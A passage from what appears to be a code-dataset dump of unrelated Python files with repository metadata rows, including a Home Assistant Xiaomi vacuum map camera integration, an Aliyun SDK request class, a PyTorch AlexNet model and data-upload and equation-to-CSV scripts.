vol.Optional(CONF_COLORS, default={}): vol.Schema({
vol.In(CONF_AVAILABLE_COLORS): COLOR_SCHEMA
}),
vol.Optional(CONF_ROOM_COLORS, default={}): vol.Schema({
cv.positive_int: COLOR_SCHEMA
}),
vol.Optional(CONF_DRAW, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_DRAWABLES)]),
vol.Optional(CONF_MAP_TRANSFORM, default={CONF_SCALE: 1, CONF_ROTATE: 0, CONF_TRIM: DEFAULT_TRIMS}):
vol.Schema({
vol.Optional(CONF_SCALE, default=1): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_ROTATE, default=0): vol.In([0, 90, 180, 270]),
vol.Optional(CONF_TRIM, default=DEFAULT_TRIMS): vol.Schema({
vol.Optional(CONF_LEFT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_RIGHT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_TOP, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_BOTTOM, default=0): PERCENT_SCHEMA
}),
}),
vol.Optional(CONF_ATTRIBUTES, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_ATTRIBUTES)]),
vol.Optional(CONF_TEXTS, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TEXT): cv.string,
vol.Required(CONF_X): vol.Coerce(float),
vol.Required(CONF_Y): vol.Coerce(float),
vol.Optional(CONF_COLOR, default=(0, 0, 0)): COLOR_SCHEMA,
vol.Optional(CONF_FONT, default=None): vol.Or(cv.string, vol.Equal(None)),
vol.Optional(CONF_FONT_SIZE, default=0): cv.positive_int
})]),
vol.Optional(CONF_SIZES, default=DEFAULT_SIZES): vol.Schema({
vol.Optional(CONF_SIZE_VACUUM_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_VACUUM_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_CHARGER_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_CHARGER_RADIUS]): POSITIVE_FLOAT_SCHEMA
}),
vol.Optional(CONF_STORE_MAP_RAW, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_IMAGE, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_PATH, default="/tmp"): cv.string,
vol.Optional(CONF_FORCE_API, default=None): vol.Or(vol.In(CONF_AVAILABLE_APIS), vol.Equal(None))
})
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
host = config[CONF_HOST]
token = config[CONF_TOKEN]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
country = config[CONF_COUNTRY]
name = config[CONF_NAME]
should_poll = config[CONF_AUTO_UPDATE]
image_config = config[CONF_MAP_TRANSFORM]
colors = config[CONF_COLORS]
room_colors = config[CONF_ROOM_COLORS]
for room, color in room_colors.items():
colors[f"{COLOR_ROOM_PREFIX}{room}"] = color
drawables = config[CONF_DRAW]
sizes = config[CONF_SIZES]
texts = config[CONF_TEXTS]
if DRAWABLE_ALL in drawables:
drawables = CONF_AVAILABLE_DRAWABLES[1:]
attributes = config[CONF_ATTRIBUTES]
store_map_raw = config[CONF_STORE_MAP_RAW]
store_map_image = config[CONF_STORE_MAP_IMAGE]
store_map_path = config[CONF_STORE_MAP_PATH]
force_api = config[CONF_FORCE_API]
entity_id = generate_entity_id(ENTITY_ID_FORMAT, name, hass=hass)
async_add_entities([VacuumCamera(entity_id, host, token, username, password, country, name, should_poll,
image_config, colors, drawables, sizes, texts, attributes, store_map_raw,
store_map_image, store_map_path, force_api)])
class VacuumCamera(Camera):
def __init__(self, entity_id, host, token, username, password, country, name, should_poll, image_config, colors,
drawables, sizes, texts, attributes, store_map_raw, store_map_image, store_map_path, force_api):
super().__init__()
self.entity_id = entity_id
self.content_type = CONTENT_TYPE
self._vacuum = miio.Vacuum(host, token)
self._connector = XiaomiCloudConnector(username, password)
self._status = CameraStatus.INITIALIZING
self._device = None
self._name = name
self._should_poll = should_poll
self._image_config = image_config
self._colors = colors
self._drawables = drawables
self._sizes = sizes
self._texts = texts
self._attributes = attributes
self._store_map_raw = store_map_raw
self._store_map_image = store_map_image
self._store_map_path = store_map_path
self._forced_api = force_api
self._used_api = None
self._map_saved = None
self._image = None
self._map_data = None
self._logged_in = False
self._logged_in_previously = True
self._received_map_name_previously = True
self._country = country
async def async_added_to_hass(self) -> None:
self.async_schedule_update_ha_state(True)
@property
def frame_interval(self):
return 1
def camera_image(self):
return self._image
@property
def name(self):
return self._name
def turn_on(self):
self._should_poll = True
def turn_off(self):
self._should_poll = False
@property
def supported_features(self):
return SUPPORT_ON_OFF
@property
def device_state_attributes(self):
attributes = {}
if self._map_data is not None:
rooms = []
if self._map_data.rooms is not None:
rooms = dict(
filter(lambda x: x[0] is not None, map(lambda x: (x[0], x[1].name), self._map_data.rooms.items())))
if len(rooms) == 0:
rooms = list(self._map_data.rooms.keys())
for name, value in {
ATTRIBUTE_CALIBRATION: self._map_data.calibration(),
ATTRIBUTE_CHARGER: self._map_data.charger,
ATTRIBUTE_CLEANED_ROOMS: self._map_data.cleaned_rooms,
ATTRIBUTE_COUNTRY: self._country,
ATTRIBUTE_GOTO: self._map_data.goto,
ATTRIBUTE_GOTO_PATH: self._map_data.goto_path,
ATTRIBUTE_GOTO_PREDICTED_PATH: self._map_data.predicted_path,
ATTRIBUTE_IGNORED_OBSTACLES: self._map_data.ignored_obstacles,
ATTRIBUTE_IGNORED_OBSTACLES_WITH_PHOTO: self._map_data.ignored_obstacles_with_photo,
ATTRIBUTE_IMAGE: self._map_data.image,
ATTRIBUTE_IS_EMPTY: self._map_data.image.is_empty,
ATTRIBUTE_MAP_NAME: self._map_data.map_name,
ATTRIBUTE_NO_GO_AREAS: self._map_data.no_go_areas,
ATTRIBUTE_NO_MOPPING_AREAS: self._map_data.no_mopping_areas,
ATTRIBUTE_OBSTACLES: self._map_data.obstacles,
ATTRIBUTE_OBSTACLES_WITH_PHOTO: self._map_data.obstacles_with_photo,
ATTRIBUTE_PATH: self._map_data.path,
ATTRIBUTE_ROOM_NUMBERS: rooms,
ATTRIBUTE_ROOMS: self._map_data.rooms,
ATTRIBUTE_VACUUM_POSITION: self._map_data.vacuum_position,
ATTRIBUTE_VACUUM_ROOM: self._map_data.vacuum_room,
ATTRIBUTE_VACUUM_ROOM_NAME: self._map_data.vacuum_room_name,
ATTRIBUTE_WALLS: self._map_data.walls,
ATTRIBUTE_ZONES: self._map_data.zones
}.items():
if name in self._attributes:
attributes[name] = value
if self._store_map_raw:
attributes[ATTRIBUTE_MAP_SAVED] = self._map_saved
if self._device is not None:
attributes[ATTR_MODEL] = self._device.model
attributes[ATTR_USED_API] = self._used_api
return attributes
@property
def should_poll(self):
return self._should_poll
def update(self):
counter = 10
if self._status != CameraStatus.TWO_FACTOR_AUTH_REQUIRED and not self._logged_in:
self._handle_login()
if self._device is None and self._logged_in:
self._handle_device()
map_name = self._handle_map_name(counter)
if map_name == "retry" and self._device is not None:
self._status = CameraStatus.FAILED_TO_RETRIEVE_MAP_FROM_VACUUM
self._received_map_name_previously = map_name != "retry"
if self._logged_in and map_name != "retry" and self._device is not None:
self._handle_map_data(map_name)
else:
_LOGGER.debug("Unable to retrieve map, reasons: Logged in - %s, map name - %s, device retrieved - %s",
self._logged_in, map_name, self._device is not None)
self._set_map_data(MapDataParser.create_empty(self._colors, str(self._status)))
self._logged_in_previously = self._logged_in
def _handle_login(self):
_LOGGER.debug("Logging in...")
self._logged_in = self._connector.login()
if self._logged_in is None:
_LOGGER.debug("2FA required")
self._status = CameraStatus.TWO_FACTOR_AUTH_REQUIRED
elif self._logged_in:
_LOGGER.debug("Logged in")
self._status = CameraStatus.LOGGED_IN
else:
_LOGGER.debug("Failed to log in")
self._status = CameraStatus.FAILED_LOGIN
if self._logged_in_previously:
_LOGGER.error("Unable to log in, check credentials")
def _handle_device(self):
_LOGGER.debug("Retrieving device info, country: %s", self._country)
country, user_id, device_id, model = self._connector.get_device_details(self._vacuum.token, self._country)
if model is not None:
self._country = country
_LOGGER.debug("Retrieved device model: %s", model)
self._device = self._create_device(user_id, device_id, model)
_LOGGER.debug("Created device, used api: %s", self._used_api)
else:
_LOGGER.error("Failed to retrieve model")
self._status = CameraStatus.FAILED_TO_RETRIEVE_DEVICE
def _handle_map_name(self, counter):
map_name = "retry"
if self._device is not None and not self._device.should_get_map_from_vacuum():
map_name = "0"
while map_name == "retry" and counter > 0:
_LOGGER.debug("Retrieving map name from device")
time.sleep(0.1)
try:
map_name = self._vacuum.map()[0]
_LOGGER.debug("Map name %s", map_name)
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except miio.DeviceException as exc:
if self._received_map_name_previously:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
self._received_map_name_previously = False
finally:
counter = counter - 1
return map_name
def _handle_map_data(self, map_name):
_LOGGER.debug("Retrieving map from Xiaomi cloud")
store_map_path = self._store_map_path if self._store_map_raw else None
map_data, map_stored = self._device.get_map(map_name, self._colors, self._drawables, self._texts,
self._sizes, self._image_config, store_map_path)
if map_data is not None:
try:
_LOGGER.debug("Map data retrieved")
self._set_map_data(map_data)
self._map_saved = map_stored
if self._map_data.image.is_empty:
_LOGGER.debug("Map is empty")
self._status = CameraStatus.EMPTY_MAP
else:
_LOGGER.debug("Map is ok")
self._status = CameraStatus.OK
except:
_LOGGER.warning("Unable to parse map data")
self._status = CameraStatus.UNABLE_TO_PARSE_MAP
else:
self._logged_in = False
_LOGGER.warning("Unable to retrieve map data")
self._status = CameraStatus.UNABLE_TO_RETRIEVE_MAP
def _set_map_data(self, map_data):
img_byte_arr = io.BytesIO()
map_data.image.data.save(img_byte_arr, format='PNG')
self._image = img_byte_arr.getvalue()
self._map_data = map_data
self._store_image()
def _create_device(self, user_id, device_id, model):
self._used_api = self._detect_api(model)
if self._used_api == CONF_AVAILABLE_API_XIAOMI:
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_VIOMI:
return ViomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_ROIDMI:
return RoidmiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_DREAME:
return DreameVacuum(self._connector, self._country, user_id, device_id, model)
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
def _detect_api(self, model: str):
if self._forced_api is not None:
return self._forced_api
if model in API_EXCEPTIONS:
return API_EXCEPTIONS[model]
def list_contains_model(prefixes):
return len(list(filter(lambda x: model.startswith(x), prefixes))) > 0
filtered = list(filter(lambda x: list_contains_model(x[1]), AVAILABLE_APIS.items()))
if len(filtered) > 0:
return filtered[0][0]
return CONF_AVAILABLE_API_XIAOMI
def _store_image(self):
if self._store_map_image:
try:
image = Image.open(io.BytesIO(self._image))
image.save(f"{self._store_map_path}/map_image_{self._device.model}.png")
except:
_LOGGER.warning("Error while saving image")
class CameraStatus(Enum):
EMPTY_MAP = 'Empty map'
FAILED_LOGIN = 'Failed to login'
FAILED_TO_RETRIEVE_DEVICE = 'Failed to retrieve device'
FAILED_TO_RETRIEVE_MAP_FROM_VACUUM = 'Failed to retrieve map from vacuum'
INITIALIZING = 'Initializing'
NOT_LOGGED_IN = 'Not logged in'
OK = 'OK'
LOGGED_IN = 'Logged in'
TWO_FACTOR_AUTH_REQUIRED = 'Two factor auth required (see logs)'
UNABLE_TO_PARSE_MAP = 'Unable to parse map'
UNABLE_TO_RETRIEVE_MAP = 'Unable to retrieve map'
def __str__(self):
return str(self._value_)
| true
| true
|
1c42205c2c3bdfdbae7dda9529705e4baf7faae6
| 1,586
|
py
|
Python
|
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/DeleteNoteRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/DeleteNoteRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/DeleteNoteRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class DeleteNoteRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Emr', '2016-04-08', 'DeleteNote','emr')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Id(self):
return self.get_query_params().get('Id')
def set_Id(self,Id):
self.add_query_param('Id',Id)
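# Usage sketch (assumption; the client setup is not shown in this file): the
# request is normally sent through an aliyunsdkcore AcsClient, e.g.
#
#     request = DeleteNoteRequest()
#     request.set_Id('<note-id>')
#     response = client.do_action_with_exception(request)
#
# where ``client`` is an AcsClient configured with credentials and a region id.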
| 36.883721
| 75
| 0.750315
|
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class DeleteNoteRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Emr', '2016-04-08', 'DeleteNote','emr')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Id(self):
return self.get_query_params().get('Id')
def set_Id(self,Id):
self.add_query_param('Id',Id)
| true
| true
|
1c422200b03e653ed0fce33c03d778100afa9fd7
| 2,131
|
py
|
Python
|
data_process/2d_1d/simon/upload_data_to_db.py
|
ribuild/delphin_6_automation
|
12024381fc1042b46314c55d88b6349229ea33b7
|
[
"MIT"
] | 2
|
2017-11-08T18:37:36.000Z
|
2018-01-09T12:10:58.000Z
|
data_process/2d_1d/simon/upload_data_to_db.py
|
ribuild/delphin_6_automation
|
12024381fc1042b46314c55d88b6349229ea33b7
|
[
"MIT"
] | 111
|
2018-02-26T08:25:44.000Z
|
2021-03-31T19:17:19.000Z
|
data_process/2d_1d/simon/upload_data_to_db.py
|
thp44/delphin_6_automation
|
12024381fc1042b46314c55d88b6349229ea33b7
|
[
"MIT"
] | 3
|
2017-11-06T10:01:25.000Z
|
2018-02-14T09:45:28.000Z
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
import os
import json
# RiBuild Modules
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_2d_1d as auth_dict
from delphin_6_automation.database_interactions import weather_interactions
from delphin_6_automation.database_interactions import delphin_interactions
from delphin_6_automation.database_interactions import material_interactions
from delphin_6_automation.database_interactions import sampling_interactions
from delphin_6_automation.database_interactions.db_templates import sample_entry
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
server = mongo_setup.global_init(auth_dict)
def upload_materials(folder):
for file in os.listdir(folder):
material_interactions.upload_material_file(f'{folder}/{file}')
def upload_weather(folder):
for file in os.listdir(folder):
print(file)
weather_interactions.upload_weather_to_db(os.path.join(folder, file))
def upload_strategy(folder):
strategy = os.path.join(folder, 'sampling_strategy.json')
with open(strategy) as file:
data = json.load(file)
sampling_interactions.upload_sampling_strategy(data)
def upload_designs(folder):
strategy = sample_entry.Strategy.objects().first()
for file in os.listdir(folder):
delphin_interactions.upload_design_file(os.path.join(folder, file), strategy.id)
# upload_weather(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\weather\WAC')
# upload_materials(r'C:\Program Files\IBK\Delphin 6.0\resources\DB_materials')
upload_strategy(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\sampling_strategy')
upload_designs(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\designs')
mongo_setup.global_end_ssh(server)
| 36.118644
| 120
| 0.714688
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
import os
import json
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_2d_1d as auth_dict
from delphin_6_automation.database_interactions import weather_interactions
from delphin_6_automation.database_interactions import delphin_interactions
from delphin_6_automation.database_interactions import material_interactions
from delphin_6_automation.database_interactions import sampling_interactions
from delphin_6_automation.database_interactions.db_templates import sample_entry
server = mongo_setup.global_init(auth_dict)
def upload_materials(folder):
for file in os.listdir(folder):
material_interactions.upload_material_file(f'{folder}/{file}')
def upload_weather(folder):
for file in os.listdir(folder):
print(file)
weather_interactions.upload_weather_to_db(os.path.join(folder, file))
def upload_strategy(folder):
strategy = os.path.join(folder, 'sampling_strategy.json')
with open(strategy) as file:
data = json.load(file)
sampling_interactions.upload_sampling_strategy(data)
def upload_designs(folder):
strategy = sample_entry.Strategy.objects().first()
for file in os.listdir(folder):
delphin_interactions.upload_design_file(os.path.join(folder, file), strategy.id)
upload_strategy(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\sampling_strategy')
upload_designs(r'C:\Users\ocni\OneDrive - Danmarks Tekniske Universitet\Shared WP6 DTU-SBiAAU\designs')
mongo_setup.global_end_ssh(server)
| true
| true
|
1c4222c1e21b8471a57878aeb66220ab3d64daec
| 1,812
|
py
|
Python
|
code/models/AlexNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 1
|
2021-11-16T03:36:51.000Z
|
2021-11-16T03:36:51.000Z
|
code/models/AlexNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | null | null | null |
code/models/AlexNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 3
|
2020-12-29T01:52:01.000Z
|
2021-11-16T03:36:52.000Z
|
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
__all__ = ['AlexNet', 'alexnet']
model_urls = {
'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth',
}
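# AlexNet variant sized for small inputs (e.g. 32x32 CIFAR images): the 3x3
# convolutions and 2x2 pooling reduce the input to a 256 x 2 x 2 feature map
# that feeds the fully connected classifier (num_classes defaults to 10).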
class AlexNet(nn.Module):
def __init__(self, num_classes=10):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 192, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), 256 * 2 * 2)
x = self.classifier(x)
#print(x.size())
return x
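# The torchvision-style alexnet() factory below is left disabled inside a
# triple-quoted block; the pretrained ImageNet weights would not fit this
# smaller classifier.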
'''
def alexnet(pretrained=False, **kwargs):
r"""AlexNet model architecture from the
`"One weird trick..." <https://arxiv.org/abs/1404.5997>`_ paper.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = AlexNet(**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['alexnet']))
return model
'''
| 30.711864
| 78
| 0.571192
|
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
__all__ = ['AlexNet', 'alexnet']
model_urls = {
'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth',
}
class AlexNet(nn.Module):
def __init__(self, num_classes=10):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 192, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), 256 * 2 * 2)
x = self.classifier(x)
return x
| true
| true
|
1c42243bb54c2335aeb253f2b0b05b730467c11e
| 163
|
py
|
Python
|
setup.py
|
DixiGroup/fuel_flow
|
d869c417d0fded452409e6572d94b77317262326
|
[
"MIT"
] | null | null | null |
setup.py
|
DixiGroup/fuel_flow
|
d869c417d0fded452409e6572d94b77317262326
|
[
"MIT"
] | null | null | null |
setup.py
|
DixiGroup/fuel_flow
|
d869c417d0fded452409e6572d94b77317262326
|
[
"MIT"
] | null | null | null |
from distutils.core import setup
import py2exe
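# Bundle fuel_transform.py into a standalone Windows console executable with
# py2exe, explicitly including the xlrd and xlsxwriter packages.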
setup(console=[{'script':'fuel_transform.py'}],
options={"py2exe":{"includes":["xlrd", "xlsxwriter"]}})
| 27.166667
| 62
| 0.668712
|
from distutils.core import setup
import py2exe
setup(console=[{'script':'fuel_transform.py'}],
options={"py2exe":{"includes":["xlrd", "xlsxwriter"]}})
| true
| true
|
1c42256fb3332783211a320c3ff901c2043853b1
| 112
|
py
|
Python
|
api/admin.py
|
vulture990/memo-App
|
8cbb63392682f57d29758dc8e842a4f1f8a4e9c3
|
[
"MIT"
] | null | null | null |
api/admin.py
|
vulture990/memo-App
|
8cbb63392682f57d29758dc8e842a4f1f8a4e9c3
|
[
"MIT"
] | 3
|
2020-06-05T18:14:29.000Z
|
2021-06-10T20:17:57.000Z
|
api/admin.py
|
vulture990/memo-App
|
8cbb63392682f57d29758dc8e842a4f1f8a4e9c3
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Note
# Register your models here.
admin.site.register(Note)
| 28
| 32
| 0.8125
|
from django.contrib import admin
from .models import Note
admin.site.register(Note)
| true
| true
|
1c4226e431d31b4206940f44ee3e0b27310391b5
| 2,196
|
py
|
Python
|
scripts/csv_handling/dataload_format_to_csv.py
|
samholt/NeuralSymbolicRegressionThatScales
|
da023e5a3fdf157ab60e56a966eeea0129366bfc
|
[
"MIT"
] | 27
|
2021-06-17T07:31:55.000Z
|
2022-03-16T14:52:16.000Z
|
scripts/csv_handling/dataload_format_to_csv.py
|
samholt/NeuralSymbolicRegressionThatScales
|
da023e5a3fdf157ab60e56a966eeea0129366bfc
|
[
"MIT"
] | 9
|
2021-07-05T12:58:42.000Z
|
2022-03-31T15:11:36.000Z
|
scripts/csv_handling/dataload_format_to_csv.py
|
samholt/NeuralSymbolicRegressionThatScales
|
da023e5a3fdf157ab60e56a966eeea0129366bfc
|
[
"MIT"
] | 5
|
2021-06-26T19:07:43.000Z
|
2022-03-23T15:09:31.000Z
|
import pandas as pd
import numpy as np
import multiprocessing
from multiprocessing import Manager
import click
import warnings
from tqdm import tqdm
import json
import os
from nesymres.dataset import generator
import time
import signal
from pathlib import Path
import pickle
from sympy import lambdify
from nesymres.utils import create_env, load_metadata_hdf5, load_eq
from nesymres.dataset import data_utils
import copyreg
import types
from itertools import chain
import traceback
import sympy as sp
from nesymres.dataset.sympy_utils import add_multiplicative_constants, add_additive_constants
import random
import hydra
from tqdm import tqdm
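# Build a pandas DataFrame of test equations: for each stored equation the
# expression string (with or without sampled constants), its variable support
# and the number of evaluation points are collected into one row.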
def create_df(path,metadata,cfg, constats_on = False):
rows = {"eq": [], "support": [], "num_points": []}
for idx in tqdm(range(metadata.total_number_of_eqs)):
eq = load_eq(path, idx, metadata.eqs_per_hdf)
w_const, wout_consts = data_utils.sample_symbolic_constants(eq,cfg.dataset_test.constants)
if constats_on:
dict_const = w_const
else:
dict_const = wout_consts
eq_string = eq.expr.format(**dict_const)
eq_string = str(sp.simplify(eq_string))
d = {}
if not eq.support:
for var in eq.variables:
d[var] = cfg.dataset_test.fun_support
rows["eq"].append(str(eq_string))
rows["support"].append(str(d))
rows["num_points"].append(cfg.dataset_test.max_number_of_points)
dataset = pd.DataFrame(rows)
return dataset
@hydra.main(config_name="../config")
def converter(cfg):
df = pd.DataFrame()
path = hydra.utils.to_absolute_path(cfg.raw_test_path)
metadata = load_metadata_hdf5(path)
df = create_df(path,metadata,cfg,constats_on = False)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_nc.csv"))
df = create_df(path,metadata,cfg,constats_on = True)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_wc.csv"))
# dataset.to_csv(hydra.utils.to_absolute_path("test_set/test.csv"))
# with open(hydra.utils.to_absolute_path("data/benchmark/test_csv"), "wb") as file:
# pickle.dump(dataset, file)
if __name__ == "__main__":
converter()
| 32.776119
| 98
| 0.718124
|
import pandas as pd
import numpy as np
import multiprocessing
from multiprocessing import Manager
import click
import warnings
from tqdm import tqdm
import json
import os
from nesymres.dataset import generator
import time
import signal
from pathlib import Path
import pickle
from sympy import lambdify
from nesymres.utils import create_env, load_metadata_hdf5, load_eq
from nesymres.dataset import data_utils
import copyreg
import types
from itertools import chain
import traceback
import sympy as sp
from nesymres.dataset.sympy_utils import add_multiplicative_constants, add_additive_constants
import random
import hydra
from tqdm import tqdm
def create_df(path,metadata,cfg, constats_on = False):
rows = {"eq": [], "support": [], "num_points": []}
for idx in tqdm(range(metadata.total_number_of_eqs)):
eq = load_eq(path, idx, metadata.eqs_per_hdf)
w_const, wout_consts = data_utils.sample_symbolic_constants(eq,cfg.dataset_test.constants)
if constats_on:
dict_const = w_const
else:
dict_const = wout_consts
eq_string = eq.expr.format(**dict_const)
eq_string = str(sp.simplify(eq_string))
d = {}
if not eq.support:
for var in eq.variables:
d[var] = cfg.dataset_test.fun_support
rows["eq"].append(str(eq_string))
rows["support"].append(str(d))
rows["num_points"].append(cfg.dataset_test.max_number_of_points)
dataset = pd.DataFrame(rows)
return dataset
@hydra.main(config_name="../config")
def converter(cfg):
df = pd.DataFrame()
path = hydra.utils.to_absolute_path(cfg.raw_test_path)
metadata = load_metadata_hdf5(path)
df = create_df(path,metadata,cfg,constats_on = False)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_nc.csv"))
df = create_df(path,metadata,cfg,constats_on = True)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_wc.csv"))
if __name__ == "__main__":
converter()
| true
| true
|
1c4227fd30ccc3e48c9226b868ed03f448567525
| 5,611
|
py
|
Python
|
src/django/api/migrations/0033_add_generate_hexgrid_function_20190909.py
|
azavea/open-apparel-registry
|
20f7a6d502d9152c85ee7f2696b25b6badf98924
|
[
"MIT"
] | 32
|
2019-01-26T05:04:03.000Z
|
2022-03-11T15:09:09.000Z
|
